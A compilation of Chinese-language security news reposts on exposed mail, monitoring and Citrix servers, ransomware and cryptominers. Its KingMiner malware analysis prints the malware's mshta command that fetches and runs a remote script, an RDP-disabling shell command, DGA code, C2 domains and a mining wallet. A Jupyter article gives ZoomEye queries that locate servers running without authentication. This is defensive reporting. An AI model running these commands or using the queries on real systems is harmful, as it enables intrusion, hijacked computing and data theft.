Shadowserver 发现 6000 多台易受攻击的 SmarterMail 服务器暴露于网络
HackerNews 编译,转载请注明出处: 网络安全非营利组织Shadowserver近日报告称,超过6000台SmarterMail服务器暴露在互联网上,极易遭受编号为CVE-2026-23760的关键身份验证绕过漏洞攻击。网络安全公司watchTowr于1月8日披露该漏洞,SmarterTools公司于1月15日发布补丁,但未分配CVE编号。 安全公告指出:”SmarterTools SmarterMail 9511版本之前的密码重置API存在身份验证绕过漏洞。强制重置密码端点允许匿名请求,且在重置系统管理员账户时未能验证现有密码或重置令牌。未经验证的攻击者只需提供目标管理员用户名和新密码即可重置账户,导致SmarterMail实例完全被管理员权限接管。” watchTowr研究人员发布了仅需管理员用户名的概念验证攻击代码。攻击者可利用此漏洞劫持管理员账户,在目标服务器实现远程代码执行,最终完全控制存在漏洞的服务器。 Shadowserver根据版本检测发现,全球超过6000台SmarterMail服务器可能易受攻击。研究人员还监测到实际攻击中已出现漏洞利用尝试。 该组织在社交媒体平台X上表示:”我们已将SmarterMail CVE-2026-23760远程代码执行漏洞纳入日常漏洞扫描。根据版本检测,全球约6000个IP地址可能受影响,并已观测到实际攻击中的漏洞利用尝试。” 数据显示,大部分存在漏洞的服务器位于美国(约4100台),其次是马来西亚(449台)、印度(188台)、加拿大(166台)和英国(146台)。 本周,美国网络安全与基础设施安全局(CISA)已将CVE-2026-23760列入其已知被利用漏洞目录,要求联邦民事行政部门机构在2026年2月16日前完成漏洞修复工作。 消息来源: securityaffairs.com: 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
Roundcube 漏洞被迅速利用,全球超 8 万台服务器受到攻击
HackerNews 编译,转载请注明出处: Roundcube关键远程代码执行漏洞(CVE-2025-49113)补丁发布数日后即遭利用,全球超80,000台服务器受影响。该流行网页邮件平台长期遭APT28、Winter Vivern等高级威胁组织锁定,攻击者惯用此类漏洞窃取登录凭证并监控敏感通信,凸显未修复系统(尤其高价值目标)持续面临严峻风险。 此CVSS评分高达9.9的关键漏洞潜伏十余年后于上周曝光,攻击者可借此完全控制受感染系统执行恶意代码,致使用户及机构陷入重大危机。漏洞发现者FearsOff创始人基里尔·菲尔索夫评估其影响超5,300万台主机(涵盖cPanel、Plesk等管理工具)。美国国家标准与技术研究院(NIST)公告指出:“Roundcube Webmail 1.5.10之前版本及1.6.x系列1.6.11之前版本存在安全隐患,因program/actions/settings/upload.php未验证URL中的_from参数,导致经身份验证的用户通过PHP对象反序列化实现远程代码执行。” 该漏洞已在1.6.11与1.5.10 LTS版本修复。漏洞披露后,Positive Technologies团队成功复现攻击链,强烈建议用户立即升级。Shadowserver基金会监测显示,目前仍有约84,000个暴露于公网的Roundcube实例未打补丁。 消息来源: securityaffairs; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
超 30 万 Prometheus 服务器暴露:凭证和 API 密钥在线泄露
HackerNews 编译,转载请注明出处: 网络安全研究人员警告称,数千台托管Prometheus监控和告警工具包的服务器面临信息泄露以及拒绝服务(DoS)和远程代码执行(RCE)攻击的风险。 “Prometheus服务器或导出器常常缺乏适当的身份验证,允许攻击者轻松收集敏感信息,如凭证和API密钥,”Aqua安全研究人员Yakir Kadkoda和Assaf Morag在一份新报告中对The Hacker News表示。 这家云安全公司还表示,用于确定堆内存使用、CPU使用等的“/debug/pprof”端点的暴露,可能成为DoS攻击的向量,使服务器无法操作。 据估计,多达296,000个Prometheus Node Exporter实例和40,300个Prometheus服务器可以通过互联网公开访问,这使得它们成为一个巨大的攻击面,可能危及数据和服务。 通过互联网暴露的Prometheus服务器泄露敏感信息,如凭证、密码、认证令牌和API密钥,这一点之前已被JFrog在2021年和Sysdig在2022年记录。 “未经认证的Prometheus服务器允许直接查询内部数据,可能暴露攻击者可以利用的秘密,以在各种组织中获得初步立足点,”研究人员说。 此外,发现“/metrics”端点不仅可以揭示内部API端点,还可以揭示子域、Docker注册表和镜像的数据——这些都是攻击者进行侦察并寻求在网络内扩大影响力的宝贵信息。 这还不是全部。对手可以向“/debug/pprof/heap”等端点发送多个同时请求,以触发CPU和内存密集型的堆剖析任务,这些任务可以压垮服务器并导致它们崩溃。 Aqua进一步指出了供应链威胁,涉及使用repojacking技术利用与已删除或重命名的GitHub仓库相关联的名称,并引入恶意第三方导出器。 具体来说,它发现Prometheus官方文档中列出的八个导出器容易受到RepoJacking攻击,从而允许攻击者重新创建具有相同名称的导出器,并托管一个恶意版本。截至2024年9月,这些问题已由Prometheus安全团队解决。 “用户如果按照文档操作,可能会无意中克隆并部署这个恶意导出器,导致他们的系统上执行远程代码,”研究人员说。 建议组织使用适当的身份验证方法保护Prometheus服务器和导出器,限制公开暴露,监控“/debug/pprof”端点是否有任何异常活动的迹象,并采取措施避免RepoJacking攻击。 消息来源:TheHackerNews; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc”并附上原文
微软 SQL 服务器遭黑客入侵,所有文件都被加密
近日,Microsoft SQL (MS-SQL) 服务器遭到攻击,因其安全性较差,入侵者进入服务器后直接安装了 Trigona 勒索软件,并加密了所有文件。 入侵者是利用了那些极易被猜到的帐户凭据为突破点,暴力攻击了MS-SQL 服务器,并安装了名为CLR Shell的恶意软件,这次攻击是被韩国网络安全公司AhnLab的安全研究人员发现的。 这种恶意软件专门用于收集系统信息,还可以直接更改那些被入侵的帐户配置。此外,该软件还可以利用Windows辅助登录服务中的漏洞将特权升级到LocalSystem,不过想完成这个操作需要启动勒索软件。AhnLab表示,CLR Shell是一种CLR汇编恶意软件,该软件在接收入侵者的命令后可直接执行恶意入侵行为,运行模式有点类似于web服务器的webshell。 然后入侵者会在下一阶段安装一个恶意软件dropper,用作svcservice.exe服务,继而就能启动Trigona勒索软件,作为svchost.exe。此外,他们还会配置勒索软件二进制文件。在每次系统重新启动时,通过Windows自动运行密钥自动启动,以确保系统在重新启动后仍处于被加密的状态。 在拿到赎金前,这个恶意软件会禁用系统针对Windows卷影副本进行恢复、删除的相关操作,所以要想恢复系统必须要有解密密钥。 Trigona勒索信,图源:BleepingComputer 2022年10月,MalwareHunterTeam首次发现了该恶意软件。在赎金方面,Trigona勒索软件仅接受门罗币加密货币。 Trigona会加密受害者设备上的所有文件,除了特定文件夹中的文件,包括Windows和Program files目录。该软件通过添加“._locked”为扩展名,以重命名加密文件,并在每个被锁定的文件中嵌入加密的解密密钥、活动ID和受害者ID(公司名称)。在进行这些加密操作之前,该团伙还声称已经窃取到了一些敏感文件,并且表示这些文件将被放到暗网上。 该软件还会创建名为“how_to_decrypt”的赎金笔记。每个文件夹中都包含一些入侵系统的信息,比如Trigona Tor协商网站的访问链接,以及包含登录协商网站所需的授权密钥。 Trigona样本提交(ID勒索软件) 自今年年初以来,Trigona勒索软件团伙已经发起了多次攻击事件。据统计,仅向ID勒索软件平台发起的攻击事件至少有190起。 转自 Freebuf,原文链接:https://www.freebuf.com/news/364194.html 封面来源于网络,如有侵权请联系删除
未启用身份验证的 Jupyter 服务器或造成数据泄露
原题:使用 ZoomEye 找到未启用身份验证的 Jupyter 服务器 作者:知道创宇404实验室 一.摘要 在使用Jupyter Notebook和JupyterLab 的过程中,有些用户缺乏安全意识,未启用身份验证功能,导致任何用户都可以直接访问自己的Jupyter服务器,并查看其服务器上的代码和文档。 我们使用ZoomEye 网络空间搜索引擎,通过特定搜索关键词,可以找到互联网上那些未启用身份验证的Jupyter服务器。这些服务器上泄露的代码和文档,若被不法分子利用,可能会造成数据泄露和资产损失。 我们建议全部Jupyter用户,在启动Jupyter服务的时候,遵循官方安全建议,设置成必须通过token或者password登录。 二.概述 ZoomEye [1] 是一款网络空间搜索引擎,通过全球部署的探测节点对全球互联网暴露资产不间断的深度探测,构建互联网安全基础态势测绘地图,为安全研究提供全面的资产基础数据。 Jupyter Notebook [2] 是以网页的形式打开,可以在网页页面中直接编写代码和运行代码,代码的运行结果也会直接在代码块下显示的程序。如在编程过程中需要编写说明文档,可在同一个页面中直接编写,便于作及时的说明和解释 [3]。 它是数据科学家们最熟悉且常用的工具之一。 JupyterLab [4] 是一个交互式的开发环境,是Jupyter Notebook的下一代产品,可以使用它编写Notebook、操作终端、编辑MarkDown文本、打开交互模式、查看csv文件及图片等功能。可以说,JupyterLab是开发者们下一阶段更主流的开发环境 [5]。 本文,我们介绍如何使用ZoomEye找到那些未启用身份验证的Jupyter服务器,并通过Web浏览器访问其中的代码和文档。 三.Jupyter产品的安装和启动 3.1 Jupyter Notebook 本章节,我们介绍如何安装、正常启动、未启用身份验证方式启动Jupyter Notebook,以及对应的Web浏览访问的效果。 Jupyter Notebook的安装方式,参考其官方网站 [6]。只需要在命令行下输入一句话命令即可,简单方便。 pip install notebook 正常启动Jupyter Notebook的方式,也是输入一句话命令,默认在本机localhost的8888端口开启一个Web服务,并且生成一个用户身份验证的token值。 jupyter notebook 启动Jupyter Notebook服务时,生成的token值此时,在Web浏览器中输入http://localhost:8888 访问Jupyter Notebook的时候,页面会提示输入password 或者 token。 ① 访问服务时,页面提示输入password或token我们在页面上输入命令行启动时获取的token值,便可通过身份验证,使用Jupyter Notebook的产品功能。 有些用户需要通过互联网访问自己的Jupyter Notebook服务,并且为了避免输入password 或者 token的麻烦,会通过如下命令,将Jupyter Notebook服务暴露在互联网IP上,并且未启用身份验证。 jupyter notebook --ip="*" --NotebookApp.token="" --NotebookApp.password="" 此时,任何用户在知晓Jupyter Notebook服务所在互联网IP的前提下,在Web浏览器中输入“http://...:8888”访问Jupyter Notebook服务,无需身份验证,便可以直接查看服务器上的代码和文件。注意,这种情况下,网页标题内容是:“Home Page – Select or create a notebook”。 ① 网页标题内容是:Home Page – Select or create a notebook 3.2 JupyterLab 本章节,我们介绍如何安装、正常启动、未启用身份验证方式启动JupyterLab,以及对应的Web浏览访问的效果。 JupyterLab的安装方式,参考其官方网站 [7]。只需要在命令行下输入一句话命令即可,简单方便。 pip install jupyterlab 正常启动JupyterLab的方式,也是输入一句话命令,默认在本机localhost的8888端口开启一个Web服务,并且生成一个用户身份验证的token值。 jupyter-lab ① 启动JupyterLab服务时,生成的token值此时,在Web浏览器中输入http://localhost:8888访问Jupyter Lab的时候,页面会提示输入password 或者 token。 ① 访问服务时,页面提示输入password或token我们在页面上输入命令行启动时获取的token值,便可通过身份验证,使用JupyterLab的产品功能。 网页标题内容是:JupyterLab有些用户需要通过互联网访问自己的JupyterLab服务,并且为了避免输入password 或者 token的麻烦,会通过如下命令,将JupyterLab服务暴露在互联网IP上,并且未启用身份验证。 jupyter-lab --ip="*" --NotebookApp.token="" --NotebookApp.password="" 此时,任何用户在知晓JupyterLab服务所在互联网IP的前提下,在Web浏览器中输入“http://*.*.*.*:8888”访问JupyterLab服务,无需身份验证,便可以直接查看服务器上的代码和文件。注意,这种情况的网页标题内容是:“JupyterLab”。 ① 网页标题内容是:JupyterLab 四.查找未启用身份验证的Jupyter服务器 如上一章节所述,未启用身份验证Jupyter Notebook服务的标题内容是“Home Page – Select or create a notebook”,未启用身份验证JupyterLab服务的标题内容是“JupyterLab”。 我们在ZoomEye上使用如下关键词进行搜索,查找到无需身份验证即可直接查看和使用的Jupyter Notebook服务器IP地址和端口,总计1180条结果。 title:"Home Page - Select or create a notebook" ① ZoomEye搜索关键词为:title:”Home Page – Select or create a notebook” ② 总计1180条结果我们在ZoomEye上使用如下关键词进行搜索,查找到无需身份验证即可直接查看和使用的JupyterLab服务器IP地址和端口,总计1597条结果。 title:"JupyterLab" ① ZoomEye搜索关键词为:title:”JupyterLab” ② 总计1597 条结果 五.Jupyter服务未启用身份验证的危害 用户在搭建Jupyter服务的时候,未启用身份验证,虽然方便了日常使用,无需输入密码;但同时也相当于将自己的代码和文档公开在互联网上,供其他用户任意访问查看,其中的登录用户名/口令、API key/secret等敏感信息若被不法分子利用,可能会造成数据泄露和资产损失。 示例一: 如下图所示,该Jupyter服务器中的代码泄露了:bitFlyer加密货币交易所的用户API的key和secret,Gmail邮箱的用户名和口令。 不法分子利用bitFlyer加密货币交易所API的key和secret,可以在交易所中创建交易、取消交易等操作,可能会造成资产损失;利用Gmail邮箱的用户名和口令,可以登录Gmail邮箱,可能会造成隐私数据泄露。 ① 泄露了bitFlyer加密货币交易所API的key和secret ② 泄露了Gmail邮箱的用户名和口令示例二: 如下图所示,该Jupyter服务器中的代码泄露了:亚马逊AWS账号的ACCESS KEY ID和SECRET ACCESS KEY。 不法分子利用亚马逊AWS账号的ACCESS KEY ID和SECRET ACCESS KEY,可以获取亚马逊AWS的该账号权限,上传文件至亚马逊S3云存储空间,甚至在亚马逊AWS上创建新的云服务器。 ① 泄露了亚马逊AWS账号的ACCESS KEY ID ② 泄露了亚马逊AWS账号的SECRET ACCESS KEY 六.结语 在使用Jupyter的时候,尽量不要将其Web服务公开在互联网上,而是开放在局域网中使用,避免被无关人员访问到。 若却有使用需求将Jupyter的Web服务公开在互联网上,则必须设置通过token或者Password登录,而不是为了贪图方便而禁用身份验证。具体操作可以参见Jupyter官方的这篇安全建议博客:Please don’t disable authentication in Jupyter servers [8]。 七.参考链接 [1] ZoomEye 网络空间搜索引擎 https://www.zoomeye.org [2] Jupyter Notebook https://jupyter.org [3] Jupyter Notebook介绍、安装及使用教程 https://zhuanlan.zhihu.com/p/33105153 [4] JupyterLab https://jupyter.org [5] JupyterLab简介及常用操作 https://support.huaweicloud.com/engineers-modelarts/modelarts_23_0209.html [6] Jupyter Notebook的安装方式 https://jupyter.org/install [7] JupyterLab的安装方式 https://jupyter.org/install [8] Please don’t disable authentication in Jupyter servers https://blog.jupyter.org/please-dont-disable-authentication-in-jupyter-servers-dd197206e7f6
赶紧自查,Citrix 数千台服务器存在严重安全风险
网络安全分析师警告称,数以千计的Citrix ADC 和网关部署仍然存在安全风险,即便该品牌服务器在此之前已经修复了两个严重的安全漏洞。 第一个漏洞是CVE-2022-27510,已于 11 月 8 日修复。可影响两种 Citrix 产品的身份验证绕过。地二个漏洞是CVE-2022-27510,已于 12 月 13 日披露并修补,其允许未经身份验证的攻击者,在易受攻击的设备上执行远程命令并控制它们。 然而,就在Citrix公司发布安全更新对漏洞进行修复时,攻击者已经在大规模利用CVE-2022-27518漏洞了。 NCC Group公司旗下的Fox IT团队的研究人员报告说,虽然大多数面向公众的 Citrix 端点已更新为安全版本,但仍有数千个端点容易受到攻击。 查找易受攻击的版本 Fox IT 分析师于 2022 年 11 月 11 日扫描了网络,发现共有3万台 Citrix 服务器在线。为了确定有多少太服务器受到上述两个漏洞的影响,安全研究人员首先要确定它们的版本号。虽说版本号未包含在服务器的HTTP 响应中,但是却携带了类似 MD5 哈希的参数,可用于将它们与 Citrix ADC 和 Gateway 产品版本进行匹配。 index.htm 中的哈希值 因此,该团队在VM上下载并部署了他们可以从 Citrix、Google Cloud Marketplace、AWS 和 Azure 获取的所有 Citrix ADC 版本,并将哈希值与版本相匹配。 将哈希链接到版本 (Fox It) 对于无法与来源版本匹配的哈希值,研究人员求助于确定构建日期并据此推断出它们的版本号。 将构建日期与哈希相关联 (Fox It) 这进一步减少了未知版本(孤立哈希)的数量,但总的来说,大多数哈希都与特定的产品版本相关联。 数以千计易受攻击的 Citrix 服务器 最终结果如下图所示,表明截至2022年12月28日,大部分服务器在13.0-88.14版本上,不受这两个安全问题的影响。 Citrix 服务器版本 (Fox It) 使用数量排名第二的版本是12.1-65.21,如果满足某些条件,则容易受到 CVE-2022-27518 的攻击,该版本至少有3500个端点在运行。攻击者对此进行利用的前提是,这些服务器必须要使用SAML SP 或 IdP 配置,因此,并非3500个系统都会受到CVE-2022-27518的影响。 有超过 1000 台服务器容易受到 CVE-2022-27510 的影响,大约 3000 个端点可能容易受上述两个严重安全漏洞的影响。 最后,Fox IT 团队希望其博客能够帮助提高 Citrix 管理员的意识,他们尚未针对最近的严重缺陷应用进行安全更新,这将会让很多用户处于风险之中。而统计数据也表明,要对所有设备的安全漏洞进行修复,供应商和企业仍有许多工作要做。 转自 Freebuf,原文链接:https://www.freebuf.com/news/353804.html 封面来源于网络,如有侵权请联系删除
科技公司因担心泄密 每年物理销毁数百万个可运行的服务器和硬盘
为了防止数据被盗,有必要完全销毁电脑或硬盘吗?专家们说没有,但科技公司却不相信。Google、微软、亚马逊以及银行、政府机构或执法部门等科技公司每年都会销毁数百万台完全可以运行服务器和硬盘,因为担心黑客会从回收的正常设备当中窃取数据。 《金融时报》的一份报告估计,每年有数以千万计的服务器、硬盘、固态硬盘等被销毁,这些都是公司或政府机构不再需要的,他们并不会清空复写它们,然后转手出售或捐赠。这种做法不仅产生了大量的技术垃圾,而且还产生了强烈的污染效应,因为销毁和制造新硬件都是高能耗的污染过程。 在许多情况下,这些被销毁的设备状况良好,完全可以使用,但公司将其丢弃,因为更好的设备已经出现,或者他们不再需要它们。原本这些使用过的服务器和硬盘可以完全擦除,然后把它们卖给二手、回收企业,或者捐给处境不利的国家、非政府组织或学校。 这些公司的员工声称,这样做是为了防止黑客窃取存储在上述硬件上的客户数据,因为一旦发生数据泄露,可能导致法律诉讼或使公司名誉受损。 这也意味着技术公司自己都不信任数据清除软件。有趣的是,在许多情况下,这些号称可以阻止泄密的软件是他们销售的。 但专家认为,如欧盟委员会的Felice Alfieri所说,保证使用高质量的擦除软件,存储介质上的数据实际上已经被破坏,无法恢复。而另一方面,对公司本身来说,销毁服务器和硬盘比重新部署和调节硬件再换下备件出售或捐赠更快、更省钱。 转自 cnBeta,原文链接:https://www.cnbeta.com/articles/tech/1324877.htm 封面来源于网络,如有侵权请联系删除
Eufy 确认其服务器出现错误 让用户看到其他家庭的安全摄像头
昨晚,一些Eufy家庭安全摄像头的用户发现,由于一个明显的安全故障,他们能够访问其它家庭的智能摄像头的画面和从未见过的用户保存的视频。这个问题在Reddit的一个帖子中被曝光,来自世界各地的用户在其中详细描述了他们的经历。 “基本上我可以看到每一个摄像头,他们的前门和后门、主卧室、客厅、车库、厨房、他们的运动记录……基本上是一切,”一位Eufy的所有者指出。”我想知道发生了什么事,因为这些视频仍然有我的电子邮件和名字作为签名,同时我还注意到一些未知的电子邮件,我猜是夏威夷主人的,在我的共享访客账户中。一个安全产品变得完全不安全,这是相当令人担忧的。” 一些人报告说,登出他们的账户并重新登录可以解决这种行为;到现在,不管是什么问题导致了这种问题,似乎都已经解决了。但是,许多用户仍然担心,他们自己的摄像机和画面可能在他们不知情的情况下被曝光。 Eufy官方随后确认了这一问题,在一条发给客户的信息中,他们将问题归结为服务器错误: 亲爱的用户: 这个问题是由于我们一个服务器的错误造成的。我们的工程团队很快解决了这个问题,客户服务团队将继续协助受影响的用户。我们建议所有用户 1.请拔掉电源插头,然后重新连接。 2.退出Eufy安全应用程序并重新登录。 3.如还有问题请联系support@eufylife.com,进行咨询。 没有迹象表明特定的个人被作为该漏洞的一部分,但对于一个经常监控私人住宅的服务来说,这仍然是一个令人不安的行为。Eufy还生产一种名为Genie的Echo Dot式语音助手,尽管Genie产品似乎没有受到该漏洞的影响。 (消息及封面来源:cnBeta)
FBI 已展开行动 从被黑 Exchange 服务器中移除后门
美国休斯敦的一家法院已经授权 FBI 展开行动,从美国数百台微软 Exchange 电子邮件服务器中“复制并删除”后门。在几个月前,黑客利用 4 个此前尚未被发现的漏洞攻击了数千个网络。美国司法部本周二宣布了这次活动,并表示这项活动是“成功”。 今年 3 月,黑客组织 Hafnium 利用 4 个漏洞链成功入侵了 Exchange 服务器,并窃取了存储在服务器上的内容。微软虽然修复了这些漏洞,但补丁并没有关闭已经被入侵的服务器的后门。几天之内,其他黑客组织开始用同样的漏洞打击脆弱的服务器,部署勒索软件。 司法部在一份声明中表示:“随着补丁的应用,受感染的服务器数量有所下降。但数百台Exchange服务器仍然脆弱,因为后门很难找到并消除。这次行动删除了一个早期黑客组织剩余的网络外壳,这些外壳可能被用来维持和升级对美国网络的持续、未经授权的访问。FBI进行删除的方式是通过web shell向服务器发出命令,该命令旨在使服务器只删除web shell(由其唯一的文件路径识别)”。 FBI表示,它正试图通过电子邮件通知从其删除后门的服务器的所有者。助理司法部长John C. Demers 说,这次行动“表明司法部致力于利用我们所有的法律工具,而不仅仅是起诉,来破坏黑客活动”。 (消息及封面来源:cnBeta)
针对 SQL 弱口令的爆破攻击再度袭来,KingMiner 矿工已控制上万台设备
感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/ZothuAaH-r1xH6HFUbz–A 一、背景 腾讯安全御见威胁情报中心检测到KingMiner变种攻击,KingMiner是一种针对Windows服务器MS SQL进行爆破攻击的门罗币挖矿木马。该木马最早于2018年6月中旬首次出现,并在随后迅速发布了两个改进版本。攻击者采用了多种逃避技术来绕过虚拟机环境和安全检测,导致一些反病毒引擎无法准确检测。 当前版本KingMiner具有以下特点: 1.针对MSSQL进行爆破攻击入侵; 2.利用WMI定时器和Windows计划任务进行持久化攻击; 3.关闭存在CVE-2019-0708漏洞机器上RDP服务,防止其他挖矿团伙入侵,以独占服务器资源挖矿; 4.使用base64和特定编码的XML、TXT、PNG文件来加密木马程序; 5.利用微软和多个知名厂商的签名文件作为父进程,“白+黑”启动木马DLL。 根据腾讯安全御见威胁情报中心统计数据,KingMiner影响超过一万台电脑,其中受影响最严重的地区为广东、重庆、北京、上海等地。 二、详细分析 KingMiner在MS SQL爆破入侵成功后,首先执行一段VBS脚本(tl.txt/vk.txt),检测操作系统版本,并根据不同的系统版本下载不同的Payload文件,利用下载的文件进行提权以及门罗币挖矿。同时还会安装WMI定时器和Windows计划任务来反复执行指定脚本,执行服务器返回的恶意代码达到持久化攻击的目的。 KingMiner变种攻击流程 提权 vk.txt从http[:]// w.30713fdae.tk/32tl.zip下载经过base64编码的二进制blob文件,经过解码后保存为C:\Users\Public\Downloads\<random>\tool.exe tool.exe利用Windows权限提升漏洞CVE-2019-0803进行攻击,成功利用此漏洞的攻击者可以在内核模式下运行任意代码,然后可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。 tool.exe在特权模式下执行命令 mshta.exe vbscript:GetObject(\"script:http[:]//aa.30583fdae.tk/r1.txt\")(window.close) 通过mshta.exe执行脚本r1.txt来进行持久化。 持久化 计时器(每15分钟执行一次VBS脚本) r1.txt配置名为WindowsSystemUpdate _WMITimer的计时器,并将执行一段脚本代码的事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate_filter绑定到计时器,从而通过计时器每15分钟执行一次下面的VBS脚本代码: 这段VBS代码根据不同情况采取两种方法生成URL,接着通过访问生成的URL下载第二阶段的Payload运行。 1.URL由IP地址转化为ASCII后拼接而成 脚本运行nslookup命令查询C&C域名news.g23thr.com的DNS记录,当news.g23thr.com解析的IP地址为xxx.xxx.xxx.120,则访问URL “http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/mgxbox.txt” 2.URL由与时间相关的DGA域名拼接而成 当查询DNS返回IP不符合指定格式,则DGA域名通过当前时间的年、月、日、分钟、秒数值计算得到,算法如下: u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"url = "http://"&minute(now())&second(now())&"."&u&"/mgxbox.txt" 计划任务 r1.txt通过RegisterTaskDefinition创建名为WindowsMonitor的计划任务,每15分钟执行一次如下脚本;或者安装触发条件为系统启动的计划任务WindowsHelper,并在WindowsHelper触发后再次安装WindowsMonitor定时任务执行同一段脚本: 计划任务最终执行的脚本如下: 计划任务执行的VBS脚本与WMITimer执行的脚本类似,通过DNS查询返回的数据,或者获取时间转换后生成的DGA域名拼接URL,执行访问URL后返回的代码。 url=“http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/pow.txt” 或者 u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"url = "http://"&minute(now())&second(now())&"."&u&"/pow.txt" 当前访问url返回的代码如下: CreateObject("WScript.Shell").Run "cmd /c ver |findstr ""5.0 5.1 5.2 6.0 6.1""&&wmic qfe GET hotfixid |findstr /i ""kb4499175 kb4500331 KB4499149 KB4499180 KB4499164""||wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0",0,False 返回代码的功能为: 获取计算机版本,并判断计算机版本是否受CVE-2019-0708漏洞的影响,且计算机是否安装特定补丁(kb4499175、kb4500331、KB4499149、KB4499180、KB4499164为微软发布的CVE-2019-0708远程桌面服务远程代码执行漏洞的补丁号)。 如果没有安装补丁,则修改设置禁止其他机器通过远程桌面服务访问本机,通过这种方式来阻止其他木马进入系统,从而达到独占挖矿资源的目的。 挖矿 vbs脚本tl.txt从http[:]// w.30713fdae.tk/32a1.zip下载经过base64编码的二进制blob文件。 文件解码并解压后保存至C:\Users\Public\Downloads\<random>\目录下,其中<random>为取当前时间“年月日时分秒”格式生成的字符。 alger.exe为微软系统文件credwiz.exed,功能描述为Credential Backup and Restore Wizard(凭据备份和还原向导),该程序在启动后自动加载系统DLL文件duer.dll并调用其导出函数InitGadgets()。 除了微软系统文件外,KingMiner在挖矿木马的“白+黑”启动过程中还利用了多个知名公司的含数字签名的文件来逃避杀软检测,利用正常的有数字签名的白文件来调用恶意dll。 目前发现的包括以下数字签名的文件被利用: “GuangZhou KuGou Computer Technology Co.,Ltd.” “Google Inc” “福建创意嘉和软件有限公司” 32a1.zip/64a1.zip解压后在同一目录下释放受信任的系统文件alger.exe(credwiz.exed)和恶意的duer.dll,利用alger.exe加载duer.dll并调用其导出的InitGadgets(),从而在InitGadgets()中解密保存在同目录下的x.txt或x/y/z.png中的XMRig挖矿程序代码,并启动门罗币挖矿过程。 三、安全建议 我们建议企业针对KingMiner挖矿木马的技术特点采取针对性的防御措施: 1.根据微软官方公告修复特权提升漏洞CVE-2019-0803: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803 2、加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿继续使用弱口令,特别是sa账号密码,防止黑客暴力破解。 3、修改SQL Sever服务默认端口,在原始配置基础上更改默认1433端口设置,并且设置访问规则,拒绝1433端口探测。 4、企业用户可在服务器部署腾讯御点终端安全管理系统,从而防范此类攻击。 5、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 腾讯御界检测到针对SQL服务器的爆破攻击 IOCs @KingMiner IP 107.154.161.209 107.154.158.39 Domain q.112adfdae.tk q.30583fdae.tk aa.30583fdae.tk w.30713fdae.tk a.1b051fdae.tk news.g23thr.com a.qwerr.ga w.ddff1.tk Md5 duser.dll 20e502ff977b336d9e7785186b16c68a 78b56b92c2e7a42520fb99a84d78cf92 active_desktop_render_x64.dll 21048ff02894656b5b24d4ed3c8a2882 goopdate.dll 7def058c5d2acb660f394d04b4698580 soundbox.dll 88a5c4645c2a9d0481fd0a846e49b773 64tl.zip be45959bc043a4fe88351cd03289f240 64a1.zip 4d910cb71c2f55bde48521f7ae062da4 32a1.zip 465373b74d163028add70f0d2b0966d0 23ef4da80f6985a78c4a59467ac4612f 32tl.zip e09947875b4722aab067c4d0c4b30384 r1.txt 21cb01553d92bee4fefc0069db1fd5ea c568d6028735cdc2a1ddd3c01f14ca80 tl.txt b0ab674b842822358be8cd5f6dc91554 vk.txt e3accf5a6f58932e56192bfbcbf0804c c874dbb6bf3664990b57d07d7d220ee6 n.txt 2b702a22963448c164db26807a308d50 pow.txt/mgxbox.txt 03d24675d4de12bcd076e7eff213a8a4 htak.txt 5fd47b2be01004e41290bf7658c7ad5a tool.exe 4899762134c0d2d8fbbaecc289a0c74e URL http[:]//4056.309cffdae.tk/vk.txt http[:]//3023.309cffdae.tk/vk.txt http[:]//5311.1d28ebfdae.com/pow.txt http[:]//3843.1d28ebfdae.com/pow.txt http[:]//5921.1d28ebfdae.com/mgxbox.txt http[:]//ww33.3096bfdae.com/32a1.cab http[:]//ww33.3096bfdae.com/64a1.cab http[:]//a.qwerr.ga/32a.zip http[:]//a.qwerr.ga/64f.zip http[:]//aa.30583fdae.tk/r1.txt http[:]//aa.30583fdae.tk/tl.txt http[:]//aa.30583fdae.tk/r1.txt http[:]//q.30583fdae.tk/32tl.zip http[:]//q.30583fdae.tk/64tl.zip http[:]//q.30583fdae.tk/64a1.zip http[:]//q.30583fdae.tk/32a1.zip http[:]//w.30713fdae.tk/vyk.txt http[:]//w.30713fdae.tk/64a1.zip http[:]//w.30713fdae.tk/32a1.zip http[:]//w.ddff1.tk/32a1.zip http[:]//w.ddff1.tk/64a1.zip 矿池: 95.179.131.54:9761 w.homewrt.com:9761 钱包: 49EHNacRauzgz8cGouhrVChcLyF3XrGLAdWiczJxY1qpX3oed4cGgMUUHHhyR7taGJ1MtvpfJiDf9gugAko4MzXM9DRYzZ1 参考链接: https://research.checkpoint.com/2018/kingminer-the-new-and-improved-cryptojacker/